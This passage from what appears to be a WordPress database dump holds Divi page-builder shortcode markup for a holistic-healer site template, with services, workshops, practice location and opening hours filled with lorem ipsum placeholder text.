border_width_all=\"1px\"][et_pb_blurb title=\"Meditatoin\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-4.png\" image_last_edited=\"off|phone\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Acupuncture\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-5.png\" image_last_edited=\"off|phone\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Services\" _builder_version=\"4.4.8\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\"]<h2>Classes & Workshops</h2>\n<p>Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Vivamus magna justo, lacinia eget consectetur sed.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Sed porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" icon_color__hover_enabled=\"on|hover\" icon_color__hover=\"#000000\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Vestibulum ante\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Nulla quis\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Sed porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Curabitur nulla\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Quisque velit\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Proin eget\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.7\"][et_pb_blurb title=\"Nulla porttitor\" url=\"#\" use_icon=\"on\" font_icon=\"%%58%%\" icon_color=\"#fbb081\" icon_placement=\"left\" use_icon_font_size=\"on\" icon_font_size=\"24px\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.4em\" header_line_height_last_edited=\"on|phone\" locked=\"off\" icon_color__hover=\"#000000\" icon_color__hover_enabled=\"on|hover\"][/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_text=\"View Calendar\" button_alignment=\"center\" _builder_version=\"4.4.8\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.4.8\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\"]<h2>Don\'t wait to make the shift to a more holistic approach</h2>[/et_pb_text][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\"]<p>Cras ultricies ligula sed magna dictum porta. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec rutrum congue leo eget malesuada. Nulla porttitor accumsan tincidunt. Curabitur aliquet quam id dui posuere blandit. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia.</p>\n<p>Donec rutrum congue leo eget malesuada. Vivamus suscipit tortor eget felis porttitor volutpat. Pellentesque in ipsum id orci porta dapibus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Curabitur aliquet quam id dui posuere blandit. Quisque velit nisi, pretium ut lacinia in elementum.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.4.8\" background_color=\"#f6ddd7\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-24.png\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-46.png\" title_text=\"holistic-healer-46\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.4.8\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\"]<h2>My Practice</h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3>Location</h3>\n<p>1234 Divi St. #1000<br /> San Francisco, CA 94220</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3>Make an Appointment</h3>\n<p>Nulla quis lorem ut libero malesuada feugiat</p>[/et_pb_text][et_pb_button button_text=\"Book Now\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3>Open Hours</h3>\n<p>Monday - Friday: 10am - 6pm<br /> Saturday: 3pm - 6pm</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-01 11:50:17','2021-05-01 03:50:17','',28,'https://verde.desidrivers.com.au/?p=94',0,'revision','',0),(90,1,'2021-05-01 11:39:02','2021-05-01 03:39:02','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||180px||false|false\" hover_enabled=\"0\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\" sticky_enabled=\"0\" background_enable_image=\"off\"][et_pb_row _builder_version=\"4.4.7\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#000000\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" hover_enabled=\"0\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\" sticky_enabled=\"0\"]<h1>My Services</h1>\n<p>Nulla quis lorem ut libero malesuada feugiat curabitur non nulla sit convallis quis ac lectus amet nisl tempus.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Services\" _builder_version=\"4.4.7\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_margin=\"-120px||||false|false\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Homeopathy\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-10.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Hypnopathy\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-2.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Eastern Medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-3.png\" image_last_edited=\"off|tablet\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Naturopathy\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-7.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Relaxation Massage\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-1.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Meditatoin\" 